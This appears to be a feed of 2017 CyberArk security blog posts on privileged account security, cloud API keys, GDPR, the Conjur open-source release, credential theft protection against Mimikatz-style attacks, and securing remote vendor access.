Q: Is there a difference between an external or internal attack?

A: The concept of inside vs. outside is obsolete. We view internal resources as hostile territory. Organizations need to treat their internal network in the same way they treat their external network. Just like you would not put an RDP connection outside, connected to the internet with a weak password, you should not do it internally. At the end of the day, a compromised workstation or malicious insider will lead to the same result.

Q:  What is the biggest deterrent to you being able to move laterally throughout a network?

A: This is relevant to almost every threat actor out there – from script kiddies to nation states and everything in between: Lateral movement occurs after an attacker finds a user’s privileged accounts and begins impersonating that user by using those privileged accounts. In almost all of our engagements, we end up searching and querying Active Directory to figure out who is logging in and from where, in our hunt for privileges. As an attacker, if I cannot access your privileged accounts (passwords, SSH keys, tokens, etc.), my job becomes infinitely harder to do.

Interested in learning more about what our Red Team’s research? Check out our Threat Research blog, which features in-depth technical research from CyberArk Labs and Red Team security experts to help you think like an attacker by keeping you ahead of the latest threats.

]]>
CyberArk Cloud Automation Capabilities Support Hybrid & Native Cloud Environments https://www.cyberark.com/blog/cyberark-cloud-automation-capabilities-support-hybrid-native-cloud-environments/ Tue, 03 Oct 2017 14:55:57 +0000 https://www.cyberark.com/?p=17773/

CyberArk’s AMI and Cloud Formation Templates enable a complete CyberArk environment, (including primary and Disaster Recovery (DR) vaults with all of the components and session monitoring), to be conveniently built and deployed in as little as 15 minutes in an AWS environment. This is very powerful for customers with “all in,” or native cloud environments. However, unless organizations have fully adopted the cloud, most will have some form of a hybrid environment. The CyberArk AMI and Cloud Formation Templates can now be configured to support hybrid environments too.

Securing the operations of both cloud and on-premises environments is one of the unique challenges of hybrid environments. Typically customers run the CyberArk Privileged Account Security Solution, including the vault, on-premises and extend into the cloud environment. But, customers can also run the vault in the cloud to support on premises and cloud workloads.

By using CyberArk’s reference architecture for AWS, the CyberArk Cloud Formation Templates can be configured to support hybrid environments. There are, of course, many different hybrid environments and potential deployment configurations.

The key decisions to make are where to deploy the primary and DR vaults, and how to deploy the components (Password Vault Web Access, Central Password Management, CyberArk Privileged Session Manager and CyberArk Privileged Session Manager SSH Proxy) to efficiently support privilege requests in the on-premises and AWS environments. In organizations with hybrid environments that are already using a privileged account security solution, the deployed solution already helps to secure the on-premises environment. In this case, the primary and DR vaults will run in the on-premises data center, but instances of the components will need to run in both the on-premises and hybrid environments.

Here, the CyberArk Cloud Formation Templates for AWS (CFT) can be used to build the components in the AWS environment. These components can then be linked to the vaults using a secure connection.

Two typical configurations are shown in the following diagrams. The first diagram, of an extended configuration, shows the vault (Primary and DR) running on premises and managing infrastructure and workloads in the on-premises environment and extended out to manage infrastructure and workloads running on the AWS cloud. Here, the CyberArk components running on AWS have been built leveraging CyberArk’s CFT and AMI automation capabilities.

Note:  To simplify the diagrams, the additional layers of redundancy and security used in a typical deployment are not shown.  The second diagram shows the vault (Primary and DR) running on the AWS cloud and managing privileges for the both the on-premises and cloud infrastructure and workloads. In this example, vaults running on AWS extend back to the on-premises environment. Note that the complete AWS environment (vaults and components) have been built leveraging CyberArk’s CFT and AMI automation capabilities.

The CyberArk architecture has been designed to be very flexible and to be configured to support complex and demanding environments. For example, configurations become more challenging when organizations use multiple cloud vendors and operate multiple on-premises environments. However, for CISOs wanting to consistently enforce security and access policies across hybrid environments, it is important to establish a single control point for the on-premises and cloud environment—this is achieved by using the same privileged account security solution to manage all the environments.

All CyberArk solutions, including CyberArk Conjur, are designed to scale to meet the needs of large enterprises with globally distributed operations. In these hybrid examples, the architecture has been designed to optimize performance by deploying the CyberArk components close to the devices they are managing. The CyberArk architecture is also designed to allow multiple instances of the components to be deployed—so components can be located on multiple on-premises and cloud environments.

The CyberArk CFT and AMIs for AWS are available now and can be configured to support various native/“all in cloud” and hybrid environments. Contact sales or customer support for additional information or learn more about how CyberArk can support your cloud environment.

 

]]>
Get Your Enterprise Ready for General Data Protection Regulation (GDPR) https://www.cyberark.com/blog/get-enterprise-ready-general-data-protection-regulation-gdpr/ Tue, 26 Sep 2017 19:16:44 +0000 https://www.cyberark.com/?p=17600/

The General Data Protection Regulation (GDPR) is said to be one of the most important changes to data privacy regulations within the past two decades. The primary purpose of GDPR is to reinforce the personal data rights for all individuals’ residing within the European Union, and subsequently harmonizing the way member states enforce data protection across this geography. The fact of the matter is, most people today do not trust their personal data in the hands of businesses – and honestly, who can blame them?

Significant personal data breaches continue to dominate headlines. Most organizations are not taking security seriously enough with some even admitting they are well aware of existing security gaps but deliberately look the other way to keep business costs down and maintain a higher profitability. As we’ve seen over the past few months, the media has highlighted both the financial and reputational implications with being caught in non-compliance – and for good reason.

GDPR will affect organizations globally. If an organization is found to be negligent, they’ll face fines north of €20 million or 4 percent of total global turnover (whichever greater of the two). Moreover, there are equally as serious reputational risks such as significant brand damage and loss of both consumer trust and loyalty. Gartner predicts that by the end of 2018, more than 50 percent of companies affected by the GDPR will not be in full compliance with its requirements.1 This begs a very important question: is your enterprise really ready?

What to Know and Understand

Understand where personal data resides within your organization. Personal data is defined as any subject’s name, address, localization, online identifier, health information, income, cultural profile and more. Enterprises should map their data flows in a prioritized manner, starting from the top down with whatever is considered to be of high risk and with whatever business processes involve gathering, processing and protecting sensitive personal data. CyberArk solutions will help an enterprise lock down the access both human and non-human users have to critical systems and applications, but before you can do that, you really need to first identify where exactly the data resides within your organization. Additionally, any personal data that no longer serves a legitimate business purpose needs to be deleted. Backups and duplicate copies of personal data files might land you in the hot seat if you don’t manage your data subjects’ ‘right to erasure’ correctly.

Get a handle on your supply chain. One important change in GDPR that was absent from its mandated predecessor (the Data Protection Directive) is the new direct legal obligations for data processors. This change brings potential litigation and damage claims directly from data subjects, whereas before, data processors really only needed to concern themselves with existing contractual agreements they had in place with their data controllers. Once GDPR goes into enforcement, both controllers and processors will be required to prove they were not held responsible in the event of a breach. You might have the most comprehensive GDPR strategy in place with all the necessary tools and components to protect your personal data – but there still remains substantial risk residing within your third-party vendor supply chain. There needs to be a greater degree of transparency across the supply chain, with a shared responsibility for securing personal data.

Additional Considerations

Given that GDPR is a very complex and far-reaching regulation that cannot be solved overnight, it’s best to not boil the ocean. Take a pragmatic approach. One of the first and most critical steps for enterprise-level organizations is to partner with an advisory consultant. Most consultancies offer GDPR-specific workshops, detailed assessments, regular testing and actionable guidance. They’ll work with your team to put in place the necessary personnel, processes and technology that align with whatever is your most optimal strategy to maintain compliance with this regulation.

I previously discussed five ways CyberArk can help you address GDPR, highlighting some of the key articles within the regulation and how CyberArk can help mitigate risk against non-compliance.  It’s well understood that complying with GDPR cannot be achieved with a single security vendor – it’s a team effort. CyberArk customers also have access to our C3 Alliance Technology Program, which provides a wide range of integrations with security solution providers from around the world. These technology integrations enable an organization to realize a much more comprehensive GDPR solution, as well as bring more value to  existing security investments.

Take the first step and download the Security Checklist for Securing Personal Data to get your enterprise ready for GDPR. Visit the CyberArk GDPR solution web page for more information on how privileged account security plays a critical part in safeguarding sensitive personal data.

Don’t get caught in the crosshairs of GDPR non-compliance. Get your enterprise ready before time runs out.

1 Gartner Press Release: “Gartner Says Organizations Are Unprepared for the 2018 European Data Protection Regulation,” May, 3 2017. gartner.com/newsroom/id/3701117

]]>
Four Critical Steps for Securing API Keys in Your Organization’s Cloud Workloads https://www.cyberark.com/blog/four-critical-steps-securing-api-keys-organizations-cloud-workloads/ Tue, 19 Sep 2017 15:22:37 +0000 https://www.cyberark.com/?p=17332/

Automation enables organizations to leverage the dynamic capabilities of the cloud. Today, enterprises are increasingly leveraging automation tools and DevOps initiatives to drive greater business agility, improve efficiency and optimize business processes. To achieve this agility securely, automation tools pass credentials through APIs to ensure that only authenticated automation tools, applications, etc. can access the organizations’ cloud resources, customer data, infrastructure and other applications. Each of the public cloud vendors uses secure credentials, generically referred to as “API keys” or “access keys,” which are unique to the organization’s cloud environment and are established during set up of the cloud environment.

For example, in Amazon Web Services (AWS) environments, scripts use AWS Access Keys for accessing data, auto-scaling and other functions. With Azure, Azure Application Keys play a similar role, as do API Keys for Google Cloud Platform. These API keys are very powerful, enabling, for example, a script or user to stop or start a virtual server, copy a database or even wipe out entire workloads. With API keys, a script or user can do pretty much anything they want within a given cloud environment. In the wrong hands, they represent a major vulnerability.

API keys essentially represent the “keys to the cloud kingdom,” but despite this far-reaching power, these keys are often relatively unprotected. For example, attackers use phishing to steal API keys by gaining access to unprotected endpoints. Keys are also often embedded within applications, automation scripts and orchestration tools. As a consequence, they are all frequently static and unchanged — they are effectively hard coded and available in any copy of the app code or script. Attackers also steal API keys from public repositories, like GitHub – in this case, from code that is inadvertently dropped into public repositories without removing the API keys. It can be an easy mistake for a developer to make, and attackers use bots to troll these repositories leaving little time for the developer to correct the error.

News reports underscore the dangers unsecured API keys present. Consider the OneLogin breach from May 2017, during which an attacker gained access to a set of API keys and used them to access the AWS API from an intermediate host with another, smaller service provider, creating havoc for the organization.

As a result, because API keys are such powerful credentials and so widely used in cloud workloads, securing them and applying the principle of least privilege is imperative.

Four Steps for Securing API Keys

To help secure the enterprises cloud workloads, enterprises should take the following four steps to prevent attackers from compromising the organizations API keys:

  1. Discover and enumerate all keys: Leverage discovery tools that can scan your cloud environment to pinpoint where API keys and other secrets exists. Assess and prioritize the API key and infrastructure vulnerabilities and collect reliable and comprehensive audit information.
  2. Remove embedded API keys: Securely remove API keys from scripts, applications and automation tools. Similarly, prevent human users from directly accessing the API keys.
  3. Secure API keys: Proactively protect API keys by storing them in a secure, centralized vault that supports strong access controls—allowing only authorized users and applications to reach them. Additionally automatically rotate API keys and apply the principles of least privilege (including reducing redundant permissions from the account role that is assigned to the API key).
  4. Automate securing credentials: Leverage API Key access to the digital vault and use integrations with automation tools and scripts to automate and ensure the secure use of the API keys. To ensure that only the correct application have access to the API keys use machine IDs and application authentication.

While moving workloads to the cloud can bring significant business benefits, it can also expand the attack surface by allowing unprotected API keys and other secrets and credentials to become damaging security vulnerabilities. In the hands of an external attacker or malicious insider, API keys could allow attackers to take full control of an organization’s cloud infrastructure, disable security controls, steal confidential information and disrupt operations.

However, while this post focuses on vulnerabilities that attackers can exploit, organizations that effectively manage their API keys, secrets and other credentials can minimize these vulnerabilities and secure their cloud workloads. In fact, with the right approach the cloud can be more secure than on-premises environments.

Learn more about protecting your cloud workloads in our new eBook “6 Key Use Cases for Securing Your Organization’s Cloud Workloads” or visit www.CyberArk.com/cloud.

 

]]>
The Whys and Wherefores of Automating Privileged Tasks https://www.cyberark.com/blog/whys-wherefores-automating-privileged-tasks/ Wed, 13 Sep 2017 21:39:56 +0000 https://www.cyberark.com/?p=17159/

A task can be defined as:

noun 1.  A piece of work that needs to be done regularly.

verb  2.  Assign a piece of work to.

IT operations teams are often inundated with menial, regular and repetitive tasks (e.g. trigger events, running daily monitoring activities and starting services) that can not only be damaging to the business when done incorrectly, but also hinder productivity. By limiting the number of tasks assigned to IT and enabling greater access to automation capabilities, performance and productivity can be significantly improved. In parallel, it’s important to protect your environment from risks such as the abuse or misuse of privileged access (insider threats), service outages caused by human error (typos) and third-party/remote vendor vulnerabilities (external threats).

Automation can be defined as:

noun 1.  The technique, method, or system of operating or controlling a process by highly automatic means, as by electronic devices, reducing human intervention to a minimum.

I recently addressed the importance of locking down the remote vendor attack pathway, as this is often an easy target for cyber attackers. By automating privileged tasks (any task to be performed by a privileged user), you can lessen potential vulnerabilities in process workflows both utilized by internal users and remote vendors alike. Once you fully automate a privileged task, you’re not only simplifying privileged account security processes, but also helping to ensure your remote vendors (who might have access to critical servers, endpoints and applications) will not inadvertently make an error that could lead to a serious security risk.

Additionally, in the DevOps world, orchestration tools are automating tasks across workflows, taking this role from IT operations and vendors – even for some systems that are no longer in existence. In the on-premises world, organizations still rely on vendors and support staff to perform tasks on an ad-hoc, often sporadic basis. Ideally, organizations should allow all of these tasks to be performed while a complete and correlated audit trail is generated automatically.

CyberArk solutions enable audit and operations teams to monitor and record the task management and automation of related activities as well as promote user accountability across the board. Users can automate maintenance and provisioning of tasks, (re)start and stop services, and only launch the applications or clients necessary to perform the task at hand – and nothing else. Users can also automate deployments through remote SSH command execution on target systems in both on-premises and cloud environments – all while maintaining the highest security standards. This functionality enables users to place restrictions on what privileged users are allowed to do with an organization’s most critical assets.

So How Does it Work?

Let’s walk through a simple example. A local Windows Server Administrator account has been on-boarded into the CyberArk Vault, and the usage of this privileged account has been limited to only a handful of allowed operations.

Full access to the server is not permitted, the user can only manage a list of services running on that server.

The user selects “Restart Service” and is then prompted to select the service to be managed, which can be pre-populated or added as a part of a drop-down list to further limit the control the user has over this account and the server.

After the user clicks ‘OK,’ the service will restart. Through the CyberArk Privileged Session Manager, a full audit trail is created capturing the completed actions by each privileged user. Any abnormal behavior, abuse of privileges or any other privileged activities associated with that privileged task will be on record and immutably stored in a tamper resistant vault. Sessions can be monitored in real time or later reviewed by a member of the audit team to improve security and support compliance regulations.

Whether your tasks ‘need to get done regularly’ or they’re something you ‘assign a piece of work to,’ it’s in your best interest to introduce automation controls. The example above shows how easily this can be done. Organizations today mostly exist in a ‘do more with less environment’ so it’s a best practice to automate simple privileged tasks to keep a high level of security and enable IT operations teams to focus on workloads that deliver more value to the organization.

Learn more about privileged task automation and management by watching our on-demand webinar, “Curse of the Typo! Automate Repeated Tasks to Improve Efficiency and Reduce Risk Around User Mistakes.”  You can review the on-demand version of the webcast at any time.

]]>
Introducing CyberArk Conjur Open Source Secrets Management Solution https://www.cyberark.com/blog/introducing-cyberark-conjur-open-source-secrets-management-solution/ Wed, 06 Sep 2017 16:21:05 +0000 https://www.cyberark.com/?p=16860/

“Don’t underestimate the power of your vision to change the world. Whether that world is your office, your community, an industry or a global movement, you need to have a core belief that what you contribute can fundamentally change the paradigm or way of thinking about problems.”–  Leroy Hood

Today, I am excited to announce the release of Conjur as open source!

For those following our story, it’s been about four months since Conjur was acquired by CyberArk, and it’s been a fantastic, high-speed ride!  Conjur has always been interested in making an open source contribution, and now with the backing, support and encouragement of our team at CyberArk, I am thrilled to unveil our open source project to the world.

Conjur has been working on novel approaches to DevOps security, based on identity management for machines for the last four years. We have worked closely with related open source tools and projects and with prominent adopters of DevOps both large and small.

Our next mission is clear – to advance machine identity and access management methods for next-generation, distributed software and IT architectures. The best way forward is to open source the Conjur platform and participate fully in the open-source community. Our community website and Slack channels are available to facilitate growth and discussion.

Don’t Compromise Security

Conjur is a free, open-source and easy-to-use solution to securely store and safely retrieve secrets in high-velocity and widely-scaled IT environments. With Conjur, DevOps practitioners can solve their secrets management challenges, for users and machines, through automation without stifling architectural and software design choices. Conjur is designed for DevOps practitioners, from application developers and DevOps engineers to architects and DIYers who simply love to code.

Conjur’s platform features include:

  • A foundational secrets management service for DevOps environments, a core security capability for any environment
  • An authentication, authorization and audit service for people, code and machines that runs independently of other DevOps platforms and tools to provide separation of concerns and duties and fine-grained access control
  • A suite of open source integrations with leading CI/CD tools based on an Experience-Driven Design (XDD) development process.
  • An architecture that is optimized for containerized environments
  • Flexible, programmable tool (Rest API, CLI)

This is just the beginning of the CyberArk Conjur journey.  The project also aims to grow into a forum to share and collaboratively discuss best practices for privileged account security and management in high-velocity and connected systems.  We hope this project will blossom into a hub for innovation in privilege management for people, code and machines.

I encourage you to visit the brand-new Conjur website at https://www.conjur.org where you can download the software or get a free cloud-hosted dev account. Stay tuned – we are just getting started.

Editor’s note: Conjur is part of the comprehensive CyberArk Privileged Account Security Solution, which helps organizations protect, monitor, detect, alert and respond to privileged account activity from mainframe to the cloud. To learn about Conjur Enterprise, please visit here.

 

]]>
Securing Your Cloud Environment: Six Critical Use Cases to Consider https://www.cyberark.com/blog/securing-cloud-environment-six-critical-use-cases-consider/ Tue, 05 Sep 2017 13:28:32 +0000 https://www.cyberark.com/?p=16549/

Migration to the cloud continues to accelerate as organizations increasingly take advantage of its many benefits—from efficiency and flexibility to competitive advantage and strategic value. In fact, 74 percent of chief financial officers at technology companies say cloud computing will have the most measurable impact on their business this year.

Here are some industry stats and predictions around this movement:

  • Cloud computing spending is growing at 4.5 times the rate of IT spending since 2009 and is expected to grow at better than 6 times the rate of IT spending from 2015 through 2020. (Source: IDC White Paper, sponsored by Salesforce, The Salesforce Economy: Enabling 1.9 Million New Jobs and $389 Billion in New Revenue Over the Next Five Years , September 2016)
  • Worldwide public cloud services market will grow 18 percent in 2017 to $246.8B, up from $209.2B in 2016. (Source: Gartner1)
  • By the end of next year, spending on IT-as-a-Service will be $547B. (Source: Deloitte)
  • Platform-as-a-Service (PaaS) adoption is predicted to be the fastest-growing sector of cloud platforms, growing from 32 percent adoption in 2017 to 56 percent by 2020. (Source: KPMG )
  • Microsoft Azure adoption increased from 26 percent in 2016 to 43 in 2017, while AWS adoption increased from 56 percent to 59 percent.(Source: RightScale)

The business benefits of the cloud are very real, but so are the vulnerabilities that exist within cloud workloads such as unprotected privileged accounts, credentials and secrets. That’s why security must play an integral role in any cloud strategy and be viewed as a shared responsibility between public cloud vendors and their customers. This is particularly important as more organizations leverage cloud to save on costs, access on-demand compute and turn to DevOps processes to increase their business agility.

While each organization’s cloud journey is different, there are a number of best practices that will likely need to be addressed to help ensure cloud workloads and infrastructures are secure. Our just-released eBook, 6 Key Use Cases for Securing Your Organization’s Cloud Workloads, outlines several important approaches organizations should take to secure their cloud workloads. The use cases are based upon our experiences of working with customers in the field.  Download it for free and visit cyberark.com/cloud for more information about how CyberArk can help your organization secure its cloud environments.

 

1 Gartner Press Release, Gartner Says Worldwide Public Cloud Services Market to Grow 18 Percent in 2017, February 2017, http://www.gartner.com/newsroom/id/3616417
]]>
How do you spell Credential Theft Protection…EPP, NGAV, or EPM? https://www.cyberark.com/blog/spell-credential-theft-protectionepp-ngav-epm/ Wed, 30 Aug 2017 13:45:44 +0000 https://www.cyberark.com/?p=16469

It’s 2017 and time to realize that cyber attackers have the advantage of time, resources and motivation. They are actively progressing to a point where they test new tactics using the same software you likely use to detect threats in the first place. Common Anti-Virus (AV) and Endpoint Protection (EPP) suites on the market are now leveraged for evading detection on the very desktops and laptops and servers you want to protect. While that is not new, the use of tools such as Shellter, OWASP-ZSC or Veil-evasion is changing the game. With these tools, hackers can easily take an exploit-capable payload and encode it, so that signature detection by anti-virus products and other signature-based detection approaches will fail to detect them. These shadow developers then test for detection using a few of the most prevalent AV scanners, often using the very online scanners that their targets use to protect their corporate assets.

This modernization of the attackers’ software development process has helped these miscreants to deploy some of the most polymorphic software kits available. While I am not trying to draw a direct connection to newer software development approaches such as DevOps, it is rather similar with these streamlined approaches hackers have adopted to evade detection. As a result, traditional static signature methods for detecting viruses, malware and APTs is past its prime.  Attackers are just too quick to generate a specific attack that they know you will likely not detect because it leverages a known vulnerability you likely didn’t patch and does so with an approach that is unique to you. On top of that, it was likely validated as undetectable by the AV suite you depend upon to protect what you hold most dear.

Not going to fall for the banana in the tail pipe

I know what you are thinking, you can do better than traditional AV offered in EPP suites, right? You are saying to yourself, “We are not an organization that gets lulled into a false sense of security. (Sorry Axel Foley.) We can install advanced, next-generation AV (or NGAV) that’s powered by the cloud and provides cyber analytics and threat intelligence.”

Of course you could do this.  But don’t fall into the hype. Why? There is a great quote by Chris Hoff about what to expect when you move your datacenter to the cloud that goes, “If your security sucks now, you will be pleasantly surprised by the lack of change should you embrace the cloud.” So applying this, if you like (or disliked) your endpoint security before, you are going to love a Next Gen platform delivered from the cloud. Ok I will admit, I might have hi-jacked that quote to help illustrate a point that just because its cloud deployed doesn’t mean it’s better.

What is important to note here is that using data analytics and intelligence sourced from a community to detect likely footprints of an attacker is indeed a great idea, as long as your analytics work 100% of the time and you have a 100% of the required data to provide the context (i.e. the log data containing the digital footprints) in the first place. While your NGAV anomaly detection-based system is “learning” what you do and figuring out what “normal is from abnormal,” you best keep your fingers crossed and hope on the double 100s always win. We all know hope is not a strategy. (Better check the tailpipe.)

A defense in depth strategy is necessary when it comes to protecting endpoints on a network. Therefore, the use of EPP or the security analytics in NGAV is a complementary addition to one of the key activities that all the security frameworks identify: hardening all of your systems. In its simplest terms, system hardening is about reducing the surface of vulnerability, or the potential for vulnerability, by first understanding all software and hardware, both authorized and unauthorized, on your network.  Then secondly, taking appropriate measures to have only what is needed to operate, and third continuously monitoring for vulnerabilities, making necessary updates to OS and application software and enforcing security policies such as password changes and timeouts.  While some of these activities can be debated as other forms of security controls beyond hardening, hardening is not a one and done activity. It should be considered a continuous process of ensuring a system (and its users) has only what it needs and nothing more to do its job.

AV products on the market today and the promises of NGAV do serve a purpose in providing another layer to aid in the protection of endpoints, but they are unfortunately weakened by only detecting what they know or have data coverage and ability to see. As a point of comparison, hardening with least privilege, app control with grey listing and credential theft protection reduces the attack surface far more significantly. Many cyber frameworks (including CIS critical controls framework) and industry analysts agree that implementing hardening is the most effective action to prevent malware. According to a recent Gartner report, “Endpoint hardening, including vulnerability, patch, privilege and policy management, and application control, is currently the most effective form of malware defense; however, most organizations are unwilling or unable to invest in the upfront effort required to reduce the attack surface.” (The Real Value of a Non-Signature-Based Anti-Malware Solution to Your Organization, 22 September 2016).

Why is system hardening so important?

System hardening across all of your endpoints is a necessary step (or set of steps as previously outlined) starting first to get an understanding of all assets both HW and SW and then taking measures to reduce the attack surface through the reduction of the possible attack vectors.  Hardening activities do not tie you to known attacks, and in fact, do not look for specific attackers.  Hardening brings you back to the basics to protect access to what attackers aim to steal: “privilege.”  In fact, SANS’ most recent security survey identified the ultimate goal of attackers is credential compromise, and the reported noted privilege escalation caused the most impact. There is a step in the process of every attack that hackers strive to achieve: escalating privileges. The reason is simple, if the attacker has administrative level control over a resource, they stand a better chance to accomplish their objective.

The most common approach to gaining more privileges is by credential theft for an administrative or privileged user account. Malware targets the credential stores on Windows systems, such as harvesting credentials from the login process, the Windows SAM, various email systems, SSH terminal sessions as well as browser stored credentials. Some malware examples that carry out this harvesting are phishing email based HawkEye and the often file-less based and PowerShell assisted Mimikatz attacks.  With a hardening strategy in place, the attacker’s ability to execute a targeted attack using either of these “live off the land” style of attack vectors is severely diminished. Microsoft to their credit acknowledges this is a potential problem and has tried to solve this with Windows 10 Credential Guard, but it’s a partial solution and easy to get around.

We have spoken previously about the value of least privilege and about application control. Using these tactics can prevent many malware attacks from playing out.  However, having an “assume breach” and “defense in depth” mindset, combined with credential store protection as a further hardening measure (which has the ability to detect and block selectively at the application process level), gives you a way to severely deter and contain an attack at the point of intrusion. The attacker would not have the ability to obtain the required credentials to pivot to another system. By way of introduction, CyberArk Endpoint Privilege Manager offers credential theft protection that helps you to spell relief around credential theft.

To illustrate one of the more common credential theft attack vectors, I’ve included an example below of how a “living off the land,” file-less type of attack using PowerShell to load Mimikatz remotely is subsequently thwarted once CyberArk Endpoint Privilege Manager with credential theft protection is activated.

The dialog above depicts how PowerShell is used to load Mimikatz and then successfully grab credentials from the LSASS process on Windows.

Once CyberArk Endpoint Privilege Manager activates credential theft protection on the LSASS process, the same attack simply fails.

Every attempt made to harvest credentials is captured within the CyberArk Endpoint Privilege Manager Eventlog. The dialog above showcases how both detect and block events on LSASS were logged within the CyberArk Endpoint Privilege Manager console.

Configuring credential theft protection within CyberArk Endpoint Privilege Manager is simple, providing granular control over various credential stores as depicted in the dialog below.

If you are ready to get “back to basics” and see what credential theft protection can do for you, request a demo of CyberArk Endpoint Privilege Manager, the first Privileged Account Security solution for every desktop, laptop and server with credential theft protection built-in.


Editor’s note: Click here to listen to Laura Melton, senior information technology associate at Texas A&M University College of Architecture, about the importance of removing local administrator rights to strengthen endpoint security using CyberArk Endpoint Privilege Manager.

]]>
CyberArk & Proofpoint Integration: Real-Time Response to Suspicious Privileged User Activity https://www.cyberark.com/blog/cyberark-proofpoint-integration-real-time-response-suspicious-privileged-user-activity/ Mon, 28 Aug 2017 18:50:26 +0000 https://www.cyberark.com/?p=16379

As attack sophistication and frequency increase, the likelihood of an attacker breaching an organization’s defense has never been higher. Increasingly successful in their attempts, attackers seek privileged accounts to achieve their mission. Privileged accounts proliferate throughout an organization’s IT environment, granting access to highly sensitive resources and paving the path of successful cyber attacks. To prevent a threat from escalating into a full-blown security breach, security teams must prioritize alerts for privileged accounts, quickly investigate these critical threats and take immediate action to stop attackers in their tracks.

By integrating the CyberArk Privileged Account Security Solution with Proofpoint Threat Response, security analysts can rapidly disrupt critical, in-progress attacks involving privileged accounts. Here is a high-level overview of how our technology integration empowers organizations to focus their efforts and resources on the highest priority targets to identify the most significant risks.

Overcoming Alert Fatigue

Today’s security professionals are overwhelmed with alerts that require manual analysis (and ultimately, time) to validate and prioritize. This time presents an opportunity for attackers to exploit a system and gain privileged access—all before a complete investigation can be conducted.

Once a privileged account, such as domain or database administrator, is captured, an attacker can move laterally at-will, disabling security controls to avoid detection and persist long term. In fact, valid privileged access is one of the most effective tools an attacker can add to his/her arsenal. To mount an effective defense, security programs must be bolstered with automation capabilities to increase incident response efficiencies and decrease response time. This provides the visibility, context and response that matters most to an organization.

The Need for an Integrated Solution

Security teams seek solutions that provide context and enriched insight, as well as the tools needed to investigate, contain and remediate incidents. Multiple joint customers of CyberArk and Proofpoint requested we combine the incident response and automation of Proofpoint Threat Response together with the Privileged Account Security of CyberArk—and we listened. The way our integrated solution works is both simple and effective.

Real-Time Response to Suspicious Privileged User Activity

Proofpoint Threat Response is an incident response automation platform that provides analysts with alert enrichment, forensic collection and comparison as well as the ability to contain users, hosts and malicious emails—automatically or at the push of a button—without complex playbooks or custom scripts. In this joint solution with CyberArk, Proofpoint Threat Response receives an alert about malicious activity, from a correlated search in Splunk, for example, then automatically enriches the alert data with critical intelligence-driven context. Threat Response then validates the user account by email address or associated IP address, providing the full user identity and attributes such as department, job title or network access and takes action by synchronizing with relevant security groups in Active Directory.

The CyberArk Privileged Account Security Solution provides privileged credential protection, session security, least privilege and application control and continuous monitoring to rapidly detect threats and report on privileged account activity. In this integration, CyberArk automatically retrieves the user group affiliation from Active Directory and provides controls to access privileged accounts according to an organization’s policy. CyberArk also provides security teams the ability to provision custom access policies for restricted users. For example, blocking a user from accessing specific databases containing sensitive cardholder data, while access to less sensitive databases are still valid.

The CyberArk solution can implement an organization’s policies that restrict a user’s access to critical assets only through CyberArk Privileged Session Manager, while blocking all other access options. The CyberArk Privileged Session Manager is a secure proxy server that separates endpoints from target systems and isolates privileged sessions to help prevent the exploitation of the critical system. This level of granularity provides an appropriate level of protection without significantly impacting operations or preventing employees from being productive.

Today’s security teams must do more with less and gain maximum benefit from the tools they already have. The partnership between CyberArk and Proofpoint provides joint customers with a combined best-in-class privileged account security solution and incident response automation and orchestration platform, stopping attackers before they stop business. The best part is this integrated solution is available to joint customers today—at no additional cost.

To learn more, watch our recent webcast/demo: “Proofpoint & CyberArk: Detect, Prioritize and Block Attacks from Escalating on Privileged User Machines.”

Editor’s Note: Tim Sullivan is a Threat Response Solutions Engineer at Proofpoint.

]]>
Locking Down the Remote Vendor Attack Pathway through Privileged Account Security https://www.cyberark.com/blog/locking-remote-vendor-attack-pathway-privileged-account-security/ Mon, 14 Aug 2017 13:44:56 +0000 https://www.cyberark.com/?p=16154

Remote vendors are everywhere, and they’re not limited to help desk services, storage and application service providers or other IT-focused MSP’s. Let’s not forget about the other vendors a company typically works with – law firms, public relations firms, HVAC, trucking companies, supply chain vendors, services companies – the list goes on. Organizations both large and small grant third-party vendors with access to their network and applications as a necessary means to do business. However, in doing this, they also introduce a potential new pathway for cyber attacks.  This pathway can be especially vulnerable given that the security controls for third-party vendors are not typically held to the same standards as those followed internally by an organization.

Locking down privileged credentials for remote vendors is a critically important step in minimizing the attack surface. A recent report showed that 67 percent of organizations had experienced a data breach that somehow tied back to a third-party vendor. This is a clear indication that attackers continue to look at third parties as an easy way to gain a foothold into a network, move laterally, escalate privileges and eventually gain access to their target assets. Before engaging with third-party vendors, organizations should fully vet each one and consider the potential risks the vendor might introduce to their business.

Mitigating Risks Associated with Remote Vendors

The first step in mitigating risks associated with remote vendor access is an obvious one – identify all third parties that have access into your internal systems. This can represent a complex ecosystem for some organizations. The number of vendors given access to systems and applications continues to increase year-over-year widening the threat landscape for attacks – and somehow remote vendor access management is still not considered to be of high priority for many organizations. CyberArk has a free tool that discovers privileged user accounts and credentials provisioned by your organization as well as those created by third parties (that perhaps you didn’t even know existed).

Organizations should be able to safely provide their remote vendors with access to the resources they need without exposing any user credentials, and at the same time, without introducing too many hoops for them to jump through. Storing passwords, SSH keys and other associated credentials with your third-party privileged accounts in a single, secured vault is how you can provide the required level of access without burdening the end user. Keeping a close eye on all privileged activity within your environment is accomplished through session isolation, monitoring and recording.  Doing this both secures and assigns all internal and external users with a baseline-level of accountability. More importantly, by adding this separation layer between the end user and target systems, you enable your users to successfully complete their tasks without directly accessing critical systems. To the end user, everything appears to be totally normal, but if an attacker were to get into the network, they wouldn’t be able to move laterally across the environment or spread harmful malware to an organization’s systems.

Putting the Right Tools in Place

What about those regular and mundane manual tasks that can be inadvertently damaging to the business? Remember that recent public cloud outage where a routine debugging exercise went haywire leading to a six hour meltdown caused by one simple little typo? Automated privileged task management (both in the cloud and on-premises) safeguards your remote vendors and internal users alike by automating manual, sometimes critically sensitive privileged tasks while simultaneously improving workflow productivity. How would you respond to high-risk commands and tasks that can lead to a mix up like above example? With the right analytics tools in place, you can pre-define default, high-risk commands that are unique to your organization and automatically notify the necessary security teams to take action when those commands have been executed. Furthermore, these tools can help you to detect and even disrupt in-progress attacks through both heuristic and advanced behavioral-based threat detection capabilities.

The CyberArk Privileged Account Security Solution can help minimize the threat associated with third party vendor management. Controlling and auditing each vendor’s access can be resource-intensive, causing meaningful activities to get lost in the shuffle. Therefore, it’s recommended to start with the areas that have the highest risk, such as access, privileged access and critical assets. CyberArk enables organizations to securely lock down remote vendor access and put the necessary security controls in place to enable third parties to safely complete tasks.

Learn more by downloading the Securing Remote Vendor Access with Privileged Account Security white paper. See how CyberArk can help to identify vulnerabilities in your organization and how you can better secure your privileged accounts against targeted attackers.

]]>
